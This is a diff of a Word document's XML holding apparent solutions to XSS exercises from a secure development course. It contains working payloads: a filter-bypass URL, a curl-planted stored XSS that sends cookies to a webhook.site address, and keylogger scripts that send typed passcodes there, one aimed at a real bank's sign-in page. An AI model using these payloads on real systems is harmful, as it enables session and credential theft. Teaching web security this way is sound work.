--- a/Solutions.docx
+++ b/Solutions.docx
@@ -1,62 +1,38 @@
 
 <file path=word/document.xml><?xml version="1.0" encoding="utf-8"?>
-<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex wp14">
+<w:document xmlns:ve="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml">
   <w:background w:color="FFFFFF" w:themeColor="background1"/>
   <w:body>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">SDL Course </w:t>
       </w:r>
       <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
         <w:t xml:space="preserve">Solutions to Selected </w:t>
       </w:r>
       <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
         <w:t>Exercises:</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
       </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
+      </w:pPr>
+      <w:r>
         <w:t>XSS:</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
       </w:pPr>
     </w:p>
     <w:p>
@@ -67,28 +43,11 @@
           <w:numId w:val="1"/>
         </w:numPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">In </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>simplexssfiltering</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t>In simplexssfiltering</w:t>
+      </w:r>
+      <w:r>
         <w:t xml:space="preserve">: </w:t>
       </w:r>
     </w:p>
@@ -100,20 +59,11 @@
           <w:numId w:val="1"/>
         </w:numPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
+      </w:pPr>
+      <w:r>
         <w:t>F</w:t>
       </w:r>
       <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
         <w:t>ind a payload to bypass filtering and get XSS</w:t>
       </w:r>
     </w:p>
@@ -124,13 +74,17 @@
         <w:ind w:left="1440" w:firstLine="0"/>
         <w:rPr>
           <w:color w:val="00B050"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:color w:val="00B050"/>
-          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:softHyphen/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="00B050"/>
         </w:rPr>
         <w:t>http://localhost:5000/aaa%3CScript%3Ealert()%3C/script%3E</w:t>
       </w:r>
@@ -143,58 +97,23 @@
           <w:numId w:val="1"/>
         </w:numPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">Try the payload in </w:t>
       </w:r>
       <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
         <w:t>3</w:t>
       </w:r>
       <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">.b in </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>simplestoredxss</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. Why doesn’t it work? Can you </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
+        <w:t xml:space="preserve">.b in simplestoredxss. Why doesn’t it work? Can you </w:t>
+      </w:r>
+      <w:r>
         <w:t>find a payload that works</w:t>
       </w:r>
       <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
         <w:t>?</w:t>
       </w:r>
       <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
         <w:t xml:space="preserve"> You can use curl.</w:t>
       </w:r>
     </w:p>
@@ -205,31 +124,13 @@
         <w:ind w:left="1440" w:firstLine="0"/>
         <w:rPr>
           <w:color w:val="00B050"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:color w:val="00B050"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>curl '</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="00B050"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>http://localhost:5000/users/create/moshe%3Cbody%20onload=open(%22https:\\webhook.site\b9be4275-fa6b-44ce-8a7b-fe7ec5ad20c9%3fa%22+document.cookie</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="00B050"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>)%3E'</w:t>
+        <w:t>curl 'http://localhost:5000/users/create/moshe%3Cbody%20onload=open(%22https:\\webhook.site\b9be4275-fa6b-44ce-8a7b-fe7ec5ad20c9%3fa%22+document.cookie)%3E'</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -240,14 +141,8 @@
           <w:numId w:val="1"/>
         </w:numPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">A keylogger is malware that records victims’ keystrokes to steal passwords and secrets that they type. </w:t>
       </w:r>
     </w:p>
@@ -256,75 +151,29 @@
         <w:pStyle w:val="ListParagraph"/>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:firstLine="0"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">You have XSS on </w:t>
       </w:r>
       <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
         <w:t>Bank of America</w:t>
       </w:r>
       <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
         <w:t>sign-in</w:t>
       </w:r>
       <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> page. Use the dev console to write XSS payload that </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>implement</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>s keylogger</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
+        <w:t xml:space="preserve"> page. Use the dev console to write XSS payload that implements keylogger</w:t>
+      </w:r>
+      <w:r>
         <w:t xml:space="preserve"> to steal the passcode</w:t>
       </w:r>
       <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
         <w:t>.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:hyperlink r:id="rId8" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
-            <w:lang w:val="en-US"/>
           </w:rPr>
           <w:t>https://www.bankofamerica.com/</w:t>
         </w:r>
@@ -334,16 +183,13 @@
       <w:pPr>
         <w:pStyle w:val="ListParagraph"/>
         <w:spacing w:line="360" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
+          <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3480C8F8" wp14:editId="77B03D89">
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
             <wp:extent cx="5943600" cy="858520"/>
             <wp:effectExtent l="0" t="0" r="0" b="5080"/>
             <wp:docPr id="1" name="Picture 1" descr="A picture containing graphical user interface&#10;&#10;Description automatically generated"/>
@@ -383,303 +229,121 @@
       <w:pPr>
         <w:pStyle w:val="ListParagraph"/>
         <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
       </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:firstLine="0"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:u w:val="single"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>Solution in local</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:u w:val="single"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>host</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:u w:val="single"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>:</w:t>
       </w:r>
       <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>http://localhost:5000/%3Cinput%20name=aaa%3E%3Cscript%3Edocument.getElementsByName(%22aaa%22)[</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>0].addEventListener(%22keyup%22,%20function()%7B%20var%20xhttp%20=%20new%20XMLHttpRequest();%20xhttp.onreadystatechange%20=%20function()%20%7B%20if%20(true)%20%7B%20return;%20%7D%20%7D;%20xhttp.open(%22GET%22,%20%22https://webhook.site/b9be4275-fa6b-44ce-8a7b-fe7ec5ad20c9?a=%22+document.getElementsByName(%22aaa%22)[0].value,%20true);%20xhttp.send();%20});%3C/script%3E</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
+        <w:t>http://localhost:5000/%3Cinput%20name=aaa%3E%3Cscript%3Edocument.getElementsByName(%22aaa%22)[0].addEventListener(%22keyup%22,%20function()%7B%20var%20xhttp%20=%20new%20XMLHttpRequest();%20xhttp.onreadystatechange%20=%20function()%20%7B%20if%20(true)%20%7B%20return;%20%7D%20%7D;%20xhttp.open(%22GET%22,%20%22https://webhook.site/b9be4275-fa6b-44ce-8a7b-fe7ec5ad20c9?a=%22+document.getElementsByName(%22aaa%22)[0].value,%20true);%20xhttp.send();%20});%3C/script%3E</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">Solution in </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>bankofamerica</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>document.getElementsByName</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>("passcode1")[0].addEventListener("keyup", function(){</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">  var </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>xhttp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> = new </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>XMLHttpRequest</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>);</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>xhttp.onreadystatechange</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> = function() {</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
+        <w:t>Solution in bankofamerica</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:t>document.getElementsByName("passcode1")[0].addEventListener("keyup", function(){</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">  var xhttp = new XMLHttpRequest();</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:t>xhttp.onreadystatechange = function() {</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">    if (true) {</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">       </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
+      </w:pPr>
+      <w:r>
         <w:t>return;</w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">    }</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
+      </w:pPr>
+      <w:r>
         <w:t>};</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>xhttp.open</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>("GET", "https://webhook.site/b9be4275-fa6b-44ce-8a7b-fe7ec5ad20c9?a="+document.getElementsByTagName("passcode1")[0].value, true);</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>xhttp.send</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>();</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t>xhttp.open("GET", "https://webhook.site/b9be4275-fa6b-44ce-8a7b-fe7ec5ad20c9?a="+document.getElementsByTagName("passcode1")[0].value, true);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:t>xhttp.send();</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t>});</w:t>
       </w:r>
     </w:p>
@@ -687,18 +351,109 @@
       <w:pPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:firstLine="0"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Another version: </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="0"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t>document.getElementsByName("passcode1")[0].addEventListener("keyup", function(){</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">  var xhttp = new XMLHttpRequest();</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t>xhttp.onreadystatechange = function() {</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">    if (true) {</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t>return;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">    }</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t>};</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="0"/>
+      </w:pPr>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>xhttp.open("GET", "https://webhook.site/9b61fa75-8efd-40a4-9acf-f7922479de3f?a="+document.getElementById("passcode1").value, true);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t>xhttp.send();</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t>});</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
     <w:sectPr>
       <w:headerReference w:type="even" r:id="rId10"/>
       <w:headerReference w:type="default" r:id="rId11"/>
@@ -716,8 +471,8 @@
 </file>
 
 <file path=word/endnotes.xml><?xml version="1.0" encoding="utf-8"?>
-<w:endnotes xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex wp14">
-  <w:endnote w:type="separator" w:id="-1">
